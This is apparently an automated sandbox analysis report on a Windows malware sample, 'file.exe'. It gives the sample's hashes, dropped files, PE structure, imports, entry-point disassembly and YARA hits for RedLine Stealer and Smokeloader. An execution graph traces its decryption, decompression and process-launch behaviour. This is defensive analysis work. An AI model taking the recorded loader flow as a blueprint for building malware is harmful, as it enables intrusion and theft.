    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.2.4.8.<./.P.i.d.>.......

    C:\ProgramData\Microsoft\Windows\WER\Temp\WERFE66.tmp.dmp

    Download File
    Process:C:\Windows\SysWOW64\WerFault.exe
    File Type:Mini DuMP crash report, 14 streams, Wed Nov 30 08:23:13 2022, 0x1205a4 type
    Category:dropped
    Size (bytes):47656
    Entropy (8bit):2.1094804680206685
    Encrypted:false
    SSDEEP:192:YpvotW/mZyO5SkbDV8+T1szomNet4r5j3Hl1NqwWk:ae5LbZ8+T1bceAZ3hck
    MD5:B8F33F0009F3DDE318CB9B992C517AEB
    SHA1:05A2D6FAEAF1B9A1D05959641B7871480F8782C2
    SHA-256:7EAE34186E263D33DD21713C8D48A45FFC0BC5D9D75AF9D5A71AF52B677F5730
    SHA-512:04EF2D049D1D9D3678A14FCA62435B725EA9A79E264A56866F2B7A9C88DDDC122A5AB754F75F1CA262CDF2C38A8D7CE4E53F3C24671B5FC81251B656774D7CF1
    Malicious:false
    Reputation:low
    Preview:MDMP....... ..........c........................D................/..........T.......8...........T............................................................................................................U...........B......d.......GenuineIntelW...........T..............c.............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

    C:\Users\user\AppData\Local\Temp\Serpodtudpwhhta.dll

    Download File
    Process:C:\Users\user\Desktop\file.exe
    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
    Category:dropped
    Size (bytes):4494336
    Entropy (8bit):6.573454988842364
    Encrypted:false
    SSDEEP:98304:2Ekp3AUUgGFofLw++PxAbc5rh5Ar/04TAYP:gp31UtFmLw95Abc5rh5Ar/NTA
    MD5:3D3D6C4F7A605B366E27DAA16D5C50F5
    SHA1:78B8FE5C09838213D0A8B1A4D4FF727C989D2AD2
    SHA-256:011D953568F11D2DC9752807D15F50144DF7D5D4277B19278477B6AC7F920804
    SHA-512:3AD1AA5FBA5BD1D45FBAC6BB4D40B6CF59B45F2C6CA5F8BCC90BA1FB16042D8D7804A96FD9738FE320E13508E623B79DE149E2F5745E8E363301E9DB119CBD20
    Malicious:false
    Reputation:low
    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......c..................?.........X&?......0?...@..........................pE.......................................@......@@..9....E..d....................@.4A...................................................J@.......@......................text.....>.......>................. ..`.itext..t.....?.......>............. ..`.data.......0?.......?.............@....bss....Tg....?..........................idata...9...@@..:....?.............@....didata.......@.......?.............@....edata........@.......?.............@..@.rdata..D.....@.......?.............@..@.reloc..4A....@..B....?.............@..B.rsrc....d....E..d...0D.............@..@.............pE.......D.............@..@........................................................

    Static File Info

    General

    File type:PE32 executable (GUI) Intel 80386, for MS Windows
    Entropy (8bit):7.994112157171111
    TrID:
    • Win32 Executable (generic) a (10002005/4) 99.96%
    • Generic Win/DOS Executable (2004/3) 0.02%
    • DOS Executable Generic (2002/1) 0.02%
    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
    File name:file.exe
    File size:3776000
    MD5:2479739c5d062ecb325147623241f007
    SHA1:4394b6d2ca4ed82a5f2d70d10cd05cfa3b35ab2c
    SHA256:728de9789af5f2ebc9ac2fac80fee25b186bc5b3acb960650934377f0c77726d
    SHA512:1c5c4d7d7fd5a7f18fed87a0d66b95b26ebfda33b4aa4f66fd8fd4432e07ebc6e6289a27ffccc1cf99e659aeb80434e833baa299ab140d82c0bcb7d863a58301
    SSDEEP:98304:CIPeMtJl37YfXo0/PrjRkwoD8sOr+616vbgD7op:CIPeMh37YfXZPvRkww3OrNEgo
    TLSH:C9063396722288F5C386833C17D0F1306D7F78936A514947F7E42A2CC77A5DAE668F48
    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q.'.5.I.5.I.5.I.....4.I.+...$.I.+...].I..]2.2.I.5.H...I.+.....I.+...4.I.+...4.I.Rich5.I.................PE..L......`...........

    File Icon

    Icon Hash:d4b4b0e0f0eaf0c0

    Static PE Info

    General

    Entrypoint:0x404c97
    Entrypoint Section:.text
    Digitally signed:false
    Imagebase:0x400000
    Subsystem:windows gui
    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    DLL Characteristics:TERMINAL_SERVER_AWARE
    Time Stamp:0x60E5ACA2 [Wed Jul 7 13:31:14 2021 UTC]
    TLS Callbacks:
    CLR (.Net) Version:
    OS Version Major:5
    OS Version Minor:0
    File Version Major:5
    File Version Minor:0
    Subsystem Version Major:5
    Subsystem Version Minor:0
    Import Hash:2ac0f7085258eff31142b9f87cb0f218

    Entrypoint Preview

    Instruction
    call 00007F93209C0D2Ch
    jmp 00007F93209BAF0Dh
    sub eax, 000003A4h
    je 00007F93209BB0B4h
    sub eax, 04h
    je 00007F93209BB0A9h
    sub eax, 0Dh
    je 00007F93209BB09Eh
    dec eax
    je 00007F93209BB095h
    xor eax, eax
    ret
    mov eax, 00000404h
    ret
    mov eax, 00000412h
    ret
    mov eax, 00000804h
    ret
    mov eax, 00000411h
    ret
    mov edi, edi
    push esi
    push edi
    mov esi, eax
    push 00000101h
    xor edi, edi
    lea eax, dword ptr [esi+1Ch]
    push edi
    push eax
    call 00007F93209BC29Eh
    xor eax, eax
    movzx ecx, ax
    mov eax, ecx
    mov dword ptr [esi+04h], edi
    mov dword ptr [esi+08h], edi
    mov dword ptr [esi+0Ch], edi
    shl ecx, 10h
    or eax, ecx
    lea edi, dword ptr [esi+10h]
    stosd
    stosd
    stosd
    mov ecx, 00796ED8h
    add esp, 0Ch
    lea eax, dword ptr [esi+1Ch]
    sub ecx, esi
    mov edi, 00000101h
    mov dl, byte ptr [ecx+eax]
    mov byte ptr [eax], dl
    inc eax
    dec edi
    jne 00007F93209BB089h
    lea eax, dword ptr [esi+0000011Dh]
    mov esi, 00000100h
    mov dl, byte ptr [eax+ecx]
    mov byte ptr [eax], dl
    inc eax
    dec esi
    jne 00007F93209BB089h
    pop edi
    pop esi
    ret
    mov edi, edi
    push ebp
    mov ebp, esp
    sub esp, 0000051Ch
    mov eax, dword ptr [00797AE0h]
    xor eax, ebp
    mov dword ptr [ebp-04h], eax
    push ebx
    push edi
    lea eax, dword ptr [ebp-00000518h]
    push eax
    push dword ptr [esi+04h]
    call dword ptr [00401170h]
    mov edi, 00000100h

    Rich Headers

    Programming Language:
    • [ASM] VS2008 build 21022
    • [ C ] VS2008 build 21022
    • [IMP] VS2005 build 50727
    • [C++] VS2008 build 21022
    • [RES] VS2008 build 21022
    • [LNK] VS2008 build 21022

    Data Directories

    NameVirtual AddressVirtual Size Is in Section
    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
    IMAGE_DIRECTORY_ENTRY_IMPORT0x10a9c0x50.text
    IMAGE_DIRECTORY_ENTRY_RESOURCE0x3cc0000x3050.rsrc
    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
    IMAGE_DIRECTORY_ENTRY_DEBUG0x12800x1c.text
    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
    IMAGE_DIRECTORY_ENTRY_TLS0x2d200x18.text
    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2cd80x40.text
    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
    IMAGE_DIRECTORY_ENTRY_IAT0x10000x23c.text
    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

    Sections

    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
    .text0x10000x107d40x10800False0.5123106060606061data6.1122560152151895IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    .data0x120000x3b97880x386000unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    .rsrc0x3cc0000x1250500x3200False0.62890625data5.650799726445505IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

    Resources

    NameRVASizeTypeLanguageCountry
    JEBOPOZUSUHARAFA0x3ce4300x55fASCII text, with very long lines (1375), with no line terminatorsRaeto-RomanceSwitzerland
    RT_ICON0x3cc2b00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0Raeto-RomanceSwitzerland
    RT_ICON0x3cc9780x568Device independent bitmap graphic, 16 x 32 x 8, image size 0Raeto-RomanceSwitzerland
    RT_ICON0x3ccee00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Raeto-RomanceSwitzerland
    RT_ICON0x3cdf880x468Device independent bitmap graphic, 16 x 32 x 32, image size 0Raeto-RomanceSwitzerland
    RT_STRING0x3ceb780x2d8dataRaeto-RomanceSwitzerland
    RT_STRING0x3cee500x1fcdataRaeto-RomanceSwitzerland
    RT_ACCELERATOR0x3ce9900xa0dataRaeto-RomanceSwitzerland
    RT_GROUP_ICON0x3ce3f00x3edataRaeto-RomanceSwitzerland
    RT_VERSION0x3cea300x148x86 executable not stripped

    Imports

    DLLImport
    KERNEL32.dllOpenMutexW, GetConsoleAliasExesLengthA, CopyFileExA, ReadConsoleOutputCharacterW, CompareStringW, SetVolumeLabelA, FillConsoleOutputAttribute, GetConsoleTitleA, QueryDosDeviceW, EnumCalendarInfoExA, GetProcessPriorityBoost, IsProcessInJob, AddConsoleAliasW, CreateFileW, SetMailslotInfo, GetWindowsDirectoryW, GetModuleHandleA, GlobalLock, CreateDirectoryExW, GetLogicalDriveStringsA, ReadConsoleInputA, FindNextVolumeMountPointW, OpenWaitableTimerA, GetVersionExA, SearchPathA, MoveFileExW, CallNamedPipeW, GetCurrentDirectoryW, GetDriveTypeA, CreateMailslotA, BuildCommDCBAndTimeoutsA, GetProcAddress, LoadLibraryA, LocalAlloc, GetBinaryTypeA, GetCPInfoExW, WriteConsoleOutputA, GetCommandLineA, EnumDateFormatsW, CancelTimerQueueTimer, GetHandleInformation, FindResourceA, CreateJobObjectA, FindFirstVolumeA, GlobalFlags, CreateNamedPipeW, InterlockedIncrement, CloseHandle, CopyFileW, GetComputerNameExA, GetShortPathNameA, FlushFileBuffers, GetLogicalDriveStringsW, InterlockedCompareExchange, EnumCalendarInfoW, GetConsoleAliasExesLengthW, InterlockedExchange, GetNamedPipeHandleStateW, GetModuleHandleW, GetCurrentActCtx, GenerateConsoleCtrlEvent, MoveFileW, AddAtomA, SetThreadPriority, FreeEnvironmentStringsW, SetConsoleTitleW, SetVolumeMountPointW, VirtualAlloc, _hread, EnumResourceLanguagesW, ClearCommBreak, QueryMemoryResourceNotification, GlobalFindAtomA, HeapWalk, SetFilePointer, GetTickCount, EnumSystemCodePagesW, VerifyVersionInfoA, LoadLibraryW, CreateFileA, GetLastError, WideCharToMultiByte, HeapReAlloc, HeapAlloc, HeapFree, UnhandledExceptionFilter, SetUnhandledExceptionFilter, DeleteFileA, GetStartupInfoA, GetCPInfo, InterlockedDecrement, GetACP, GetOEMCP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, TerminateProcess, GetCurrentProcess, IsDebuggerPresent, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, HeapCreate, VirtualFree, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, GetEnvironmentStringsW, SetHandleCount, GetFileType, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, SetStdHandle, GetConsoleCP, GetConsoleMode, RtlUnwind, InitializeCriticalSectionAndSpinCount, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, HeapSize, ReadFile
    GDI32.dllGetCharWidthA, GetCharABCWidthsA
    WINHTTP.dllWinHttpSetOption

    Possible Origin

    Language of compilation systemCountry where language is spokenMap
    Raeto-RomanceSwitzerland

    Network Behavior

    No network behavior found

    Statistics

    CPU Usage

    Click to jump to process

    Memory Usage

    Click to jump to process

    High Level Behavior Distribution

    Click to dive into process behavior distribution

    Behavior

    Click to jump to process

    System Behavior

    General

    Target ID:0
    Start time:00:22:59
    Start date:30/11/2022
    Path:C:\Users\user\Desktop\file.exe
    Wow64 process (32bit):true
    Commandline:C:\Users\user\Desktop\file.exe
    Imagebase:0x400000
    File size:3776000 bytes
    MD5 hash:2479739C5D062ECB325147623241F007
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:Borland Delphi
    Yara matches:
    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.258419981.0000000002766000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.260555630.0000000002AF0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
    Reputation:low

    General

    Target ID:1
    Start time:00:23:07
    Start date:30/11/2022
    Path:C:\Windows\SysWOW64\rundll32.exe
    Wow64 process (32bit):true
    Commandline:C:\Windows\system32\rundll32.exe C:\Users\user\AppData\Local\Temp\Serpodtudpwhhta.dll,start
    Imagebase:0x80000
    File size:61952 bytes
    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:Borland Delphi
    Reputation:high

    General

    Target ID:3
    Start time:00:23:12
    Start date:30/11/2022
    Path:C:\Windows\SysWOW64\WerFault.exe
    Wow64 process (32bit):true
    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5248 -s 668
    Imagebase:0x8c0000
    File size:434592 bytes
    MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    Disassembly

    Reset < >

      Execution Graph

      Execution Coverage:16.4%
      Dynamic/Decrypted Code Coverage:2.8%
      Signature Coverage:34.1%
      Total number of Nodes:425
      Total number of Limit Nodes:39
      execution_graph 20994 410820 20995 41084b 20994->20995 20996 4108bc RaiseException 20995->20996 20997 4108e4 20995->20997 20998 410951 20996->20998 20997->20998 20999 410984 20997->20999 21000 410979 LoadLibraryA 20997->21000 21003 410a1a 20997->21003 21005 4109d3 20999->21005 21006 410988 GetLastError 20999->21006 21000->20999 21001 410a83 21001->20998 21004 410a87 GetLastError 21001->21004 21002 410a77 GetProcAddress 21002->21001 21003->20998 21003->21001 21003->21002 21007 410a98 21004->21007 21011 4109e1 21005->21011 21012 410a14 FreeLibrary 21005->21012 21008 410999 21006->21008 21007->20998 21010 410aaa RaiseException 21007->21010 21008->21005 21009 4109ab RaiseException 21008->21009 21009->20998 21010->20998 21011->21003 21013 4109e7 LocalAlloc 21011->21013 21012->21003 21013->21003 21014 4109f7 21013->21014 21014->21003 21459 40581c 25 API calls 21465 883f6c CryptDestroyHash 21129 8991af 88 API calls 21461 40e907 14 API calls 21130 405968 21131 405bc8 21130->21131 21138 405980 21130->21138 21132 405ce0 21131->21132 21133 405b8c 21131->21133 21134 405714 VirtualAlloc 21132->21134 21135 405ce9 21132->21135 21139 405be6 21133->21139 21142 405ba6 Sleep 21133->21142 21140 40574f 21134->21140 21141 40573f 21134->21141 21136 4059a1 21137 405992 21137->21136 21144 405a80 21137->21144 21148 405a61 Sleep 21137->21148 21138->21137 21146 405a1d Sleep 21138->21146 21149 40564c VirtualAlloc 21139->21149 21150 405c04 21139->21150 21154 4056c8 21141->21154 21142->21139 21145 405bbc Sleep 21142->21145 21153 405a8c 21144->21153 21159 40564c 21144->21159 21145->21133 21146->21137 21147 405a33 Sleep 21146->21147 21147->21138 21148->21144 21152 405a77 Sleep 21148->21152 21149->21150 21152->21137 21155 405710 21154->21155 21156 4056d1 21154->21156 21155->21140 21156->21155 21157 4056dc Sleep 21156->21157 21157->21155 21158 4056f6 Sleep 21157->21158 21158->21156 21163 4055e0 21159->21163 21161 405655 VirtualAlloc 21162 40566c 21161->21162 21162->21153 21164 405580 21163->21164 21164->21161 21458 89b4c1 SysFreeString 21460 6c3964 VariantClear VariantClear VariantInit VariantCopy VariantCopy 20979 2766026 20980 2766035 20979->20980 20983 27667c6 20980->20983 20986 27667e1 20983->20986 20984 27667ea CreateToolhelp32Snapshot 20985 2766806 Module32First 20984->20985 20984->20986 20987 2766815 20985->20987 20988 276603e 20985->20988 20986->20984 20986->20985 20990 2766485 20987->20990 20991 27664b0 20990->20991 20992 27664c1 VirtualAlloc 20991->20992 20993 27664f9 20991->20993 20992->20993 21015 6c2a58 21020 40f0ec 21015->21020 21017 6c2a78 21025 409394 22 API calls 21017->21025 21021 40f0f4 21020->21021 21021->21021 21024 40f141 21021->21024 21026 40c54c 21021->21026 21023 40f130 LoadStringW 21023->21024 21024->21017 21027 40c579 21026->21027 21028 40c55a 21026->21028 21027->21023 21028->21027 21031 40c504 21028->21031 21032 40c514 GetModuleFileNameW 21031->21032 21033 40c530 21031->21033 21035 40d778 GetModuleFileNameW 21032->21035 21033->21023 21036 40d7c6 21035->21036 21041 40d654 21036->21041 21038 40d7f2 21039 40d804 LoadLibraryExW 21038->21039 21040 40d80c 21038->21040 21039->21040 21040->21033 21045 40d675 21041->21045 21042 40d6fd 21042->21038 21044 40d6ea 21046 40d6f0 21044->21046 21047 40d6ff GetUserDefaultUILanguage 21044->21047 21045->21042 21059 40d390 21045->21059 21048 40d4bc 2 API calls 21046->21048 21063 40cd40 EnterCriticalSection 21047->21063 21048->21042 21050 40d70c 21083 40d4bc 21050->21083 21052 40d719 21053 40d741 21052->21053 21054 40d727 GetSystemDefaultUILanguage 21052->21054 21053->21042 21087 40d588 21053->21087 21056 40cd40 17 API calls 21054->21056 21057 40d734 21056->21057 21058 40d4bc 2 API calls 21057->21058 21058->21053 21060 40d3b2 21059->21060 21062 40d3bc 21059->21062 21095 40d074 21060->21095 21062->21044 21064 40cd8c LeaveCriticalSection 21063->21064 21065 40cd6c 21063->21065 21117 409c98 21064->21117 21067 40cd7d LeaveCriticalSection 21065->21067 21073 40ce2e 21067->21073 21068 40cd9d IsValidLocale 21069 40cdfb EnterCriticalSection 21068->21069 21070 40cdac 21068->21070 21074 40ce13 21069->21074 21071 40cdc0 21070->21071 21072 40cdb5 21070->21072 21120 40ca28 IsValidLocale GetLocaleInfoW GetLocaleInfoW 21071->21120 21119 40cc24 6 API calls 21072->21119 21073->21050 21078 40ce24 LeaveCriticalSection 21074->21078 21077 40cdc9 GetSystemDefaultUILanguage 21077->21069 21079 40cdd3 21077->21079 21078->21073 21080 40cde4 GetSystemDefaultUILanguage 21079->21080 21121 40ca28 IsValidLocale GetLocaleInfoW GetLocaleInfoW 21080->21121 21082 40cdbe 21082->21069 21085 40d4da 21083->21085 21084 40d555 21084->21052 21085->21084 21122 40d450 21085->21122 21127 409d7c 21087->21127 21090 40d5d8 21091 40d450 2 API calls 21090->21091 21092 40d5ec 21091->21092 21093 40d61a 21092->21093 21094 40d450 2 API calls 21092->21094 21093->21042 21094->21093 21096 40d08b 21095->21096 21097 40d09f GetModuleFileNameW 21096->21097 21098 40d0b4 21096->21098 21097->21098 21099 40d283 21098->21099 21100 40d0dc RegOpenKeyExW 21098->21100 21099->21062 21101 40d103 RegOpenKeyExW 21100->21101 21102 40d19d 21100->21102 21101->21102 21103 40d121 RegOpenKeyExW 21101->21103 21116 40ce84 7 API calls 21102->21116 21103->21102 21105 40d13f RegOpenKeyExW 21103->21105 21105->21102 21107 40d15d RegOpenKeyExW 21105->21107 21106 40d1bb RegQueryValueExW 21108 40d20c RegQueryValueExW 21106->21108 21110 40d1d9 21106->21110 21107->21102 21109 40d17b RegOpenKeyExW 21107->21109 21111 40d20a 21108->21111 21112 40d228 21108->21112 21109->21099 21109->21102 21114 40d1e1 RegQueryValueExW 21110->21114 21113 40d272 RegCloseKey 21111->21113 21115 40d230 RegQueryValueExW 21112->21115 21113->21062 21114->21111 21115->21111 21116->21106 21118 409c9e 21117->21118 21118->21068 21119->21082 21120->21077 21121->21082 21123 40d465 21122->21123 21124 40d482 FindFirstFileW 21123->21124 21125 40d492 FindClose 21124->21125 21126 40d498 21124->21126 21125->21126 21126->21085 21128 409d80 GetUserDefaultUILanguage GetLocaleInfoW 21127->21128 21128->21090 21463 87a511 CryptReleaseContext 21457 40e858 41 API calls 21462 8799ff 42 API calls 21165 8a4510 21172 4107d4 GetModuleHandleW 21165->21172 21167 8a4520 21174 897244 21167->21174 21169 8a4525 21208 4099c8 21169->21208 21173 41080f 21172->21173 21173->21167 21175 89724c 21174->21175 21221 85e760 21175->21221 21177 897543 21258 873660 GetTempPathW 21177->21258 21179 89754e 21260 4071f0 21179->21260 21182 898a09 21183 4235f0 7 API calls 21182->21183 21186 898def 21182->21186 21187 898a2f 21183->21187 21184 89797a 21266 885b34 21184->21266 21185 885b34 56 API calls 21189 899972 21185->21189 21186->21169 21186->21185 21187->21186 21188 87c50c 6 API calls 21187->21188 21190 898c67 21188->21190 21192 89aa3f 21189->21192 21277 4235f0 21189->21277 21195 87e220 14 API calls 21190->21195 21342 407eac 21192->21342 21194 89b0f0 21196 407eac 10 API calls 21194->21196 21195->21186 21199 89b2fd 21196->21199 21197 899a4f 21205 89a09e 21197->21205 21290 880028 21197->21290 21199->21169 21200 899ee1 21296 87c50c 21200->21296 21203 89a05a 21309 87e220 21203->21309 21324 873bf4 21205->21324 21206 89a782 21335 87518c 21206->21335 21209 4099f5 21208->21209 21211 4099e4 21208->21211 21210 4099fe GetCurrentThreadId 21209->21210 21217 409a0b 21209->21217 21210->21217 21455 409930 GetStdHandle WriteFile GetStdHandle WriteFile 21211->21455 21213 4099ee 21213->21209 21214 406f34 19 API calls 21214->21217 21216 407eac 10 API calls 21216->21217 21217->21214 21217->21216 21218 409a9b FreeLibrary 21217->21218 21219 409ac3 ExitProcess 21217->21219 21451 409628 21217->21451 21218->21217 21222 85e768 21221->21222 21223 85ee95 21222->21223 21224 85f152 GetModuleHandleW 21223->21224 21225 85f160 21224->21225 21226 85f251 21225->21226 21228 86eb5b 21225->21228 21227 85f5bb GetProcAddress 21226->21227 21234 85f5d5 21227->21234 21346 409ce0 21228->21346 21230 86f141 21231 409ce0 SysFreeString 21230->21231 21232 86f187 21231->21232 21233 409ce0 SysFreeString 21232->21233 21236 86f272 21233->21236 21235 85f908 GetProcAddress 21234->21235 21239 85f91c 21235->21239 21237 409ce0 SysFreeString 21236->21237 21238 86f358 21237->21238 21238->21177 21240 85ffaa GetProcAddress 21239->21240 21241 85ffd3 21240->21241 21242 8602ac GetProcAddress 21241->21242 21243 8602ce 21242->21243 21244 860462 GetProcAddress 21243->21244 21245 860484 21244->21245 21246 860684 GetProcAddress 21245->21246 21248 8606a7 21246->21248 21247 861286 GetProcAddress 21249 8612a4 21247->21249 21248->21247 21250 8616d0 GetProcAddress 21249->21250 21251 8616ea 21250->21251 21252 861ac1 GetProcAddress 21251->21252 21253 861ada 21252->21253 21254 861dba GetProcAddress 21253->21254 21255 861ddc 21254->21255 21256 8620ba GetProcAddress 21255->21256 21257 8620e1 21256->21257 21257->21177 21259 8736c5 21258->21259 21259->21179 21261 407204 21260->21261 21262 407226 GetCommandLineW 21261->21262 21263 407208 GetModuleFileNameW 21261->21263 21265 40722d 21262->21265 21264 407224 21263->21264 21264->21265 21265->21184 21267 885b3d 21266->21267 21271 888883 21267->21271 21349 878884 21267->21349 21269 888867 21371 881940 21269->21371 21271->21182 21272 888875 21272->21271 21273 888dce RtlDecompressBuffer 21272->21273 21276 888de6 21273->21276 21274 407eac 10 API calls 21275 88961a 21274->21275 21275->21182 21276->21274 21390 40a928 21277->21390 21279 4235fe GetFileAttributesW 21280 42365a GetLastError 21279->21280 21281 42360b 21279->21281 21282 423614 21280->21282 21283 423666 21280->21283 21281->21282 21284 423620 CreateFileW 21281->21284 21282->21197 21283->21282 21285 423670 21283->21285 21286 423644 GetLastError 21284->21286 21287 42363a CloseHandle 21284->21287 21392 4235b0 FindFirstFileW FindClose 21285->21392 21286->21282 21287->21282 21289 423677 21289->21282 21292 880030 21290->21292 21295 880fae 21292->21295 21393 407250 QueryPerformanceCounter 21292->21393 21293 88073b 21294 878884 48 API calls 21293->21294 21294->21295 21295->21200 21297 87c514 21296->21297 21297->21297 21298 87c51b InitializeSecurityDescriptor 21297->21298 21299 87c547 21298->21299 21308 87c9b6 21298->21308 21300 87c629 InitializeAcl 21299->21300 21301 87c645 21300->21301 21300->21308 21302 87c74b CreateWellKnownSid 21301->21302 21304 87c766 21302->21304 21303 87c903 CreateWellKnownSid 21305 87c91d AddAccessAllowedAce 21303->21305 21303->21308 21304->21303 21306 87c93a 21305->21306 21305->21308 21307 87c99c SetSecurityDescriptorDacl 21306->21307 21307->21308 21308->21203 21310 87e229 21309->21310 21310->21310 21396 409d9c 21310->21396 21312 87e251 21313 4235f0 7 API calls 21312->21313 21322 87e278 21313->21322 21314 87e9c4 21315 87e9e0 CreateFileW 21314->21315 21316 87ea8c 21315->21316 21319 87e9f4 21315->21319 21317 409ce0 SysFreeString 21316->21317 21318 87eac6 21317->21318 21318->21205 21321 87ea61 WriteFile CloseHandle 21319->21321 21320 87e9bd DeleteFileW 21320->21314 21321->21316 21322->21314 21323 87e673 21322->21323 21323->21320 21323->21322 21327 873bfc 21324->21327 21325 873f8b GetWindowsDirectoryW 21402 409e50 21325->21402 21327->21325 21328 873fb2 21332 874170 21328->21332 21408 871424 21328->21408 21330 87415d 21420 40a730 SysAllocStringLen SysFreeString SysFreeString SysFreeString 21330->21420 21333 409ce0 SysFreeString 21332->21333 21334 87427f 21333->21334 21334->21206 21336 409d9c 2 API calls 21335->21336 21337 8751de 21336->21337 21338 875c3f CreateProcessW 21337->21338 21339 875c4c 21338->21339 21340 409ce0 SysFreeString 21339->21340 21341 875ed6 21340->21341 21341->21192 21343 407eb0 21342->21343 21344 407eb7 21342->21344 21431 405cec 21343->21431 21344->21194 21347 409cf4 21346->21347 21348 409ce6 SysFreeString 21346->21348 21347->21230 21348->21347 21351 87888c 21349->21351 21350 878aec CryptAcquireContextA 21352 878b09 21350->21352 21355 87aec5 21350->21355 21351->21350 21353 878b83 CryptCreateHash 21352->21353 21357 878ba2 21353->21357 21363 87a5d5 21353->21363 21354 87ac44 CryptReleaseContext 21358 87ac5b 21354->21358 21355->21269 21356 878ed5 CryptHashData 21359 878ef1 21356->21359 21364 879a67 21356->21364 21357->21356 21358->21269 21362 879362 CryptGetHashParam 21359->21362 21360 87a3c9 CryptDestroyHash 21361 87a3e1 21360->21361 21361->21269 21362->21364 21365 87937e 21362->21365 21363->21354 21364->21360 21388 40c12c 41 API calls 21365->21388 21367 87971f CryptGetHashParam 21367->21364 21368 879740 21367->21368 21370 8797f1 21368->21370 21389 8770c4 41 API calls 21368->21389 21370->21269 21382 881948 21371->21382 21372 881f35 CryptAcquireContextA 21373 881f52 21372->21373 21377 884e70 21372->21377 21374 88218f CryptCreateHash 21373->21374 21375 884a59 CryptReleaseContext 21374->21375 21379 8821ae 21374->21379 21376 884a85 21375->21376 21376->21272 21377->21272 21378 8825a5 CryptHashData 21380 8825c1 21378->21380 21385 8834a6 21378->21385 21379->21378 21381 8826f6 CryptDeriveKey 21380->21381 21383 88271c 21381->21383 21381->21385 21382->21372 21384 882840 CryptDecrypt 21383->21384 21387 882874 21384->21387 21385->21272 21386 883485 CryptDestroyKey 21386->21385 21387->21386 21388->21367 21389->21364 21391 40a92e 21390->21391 21391->21279 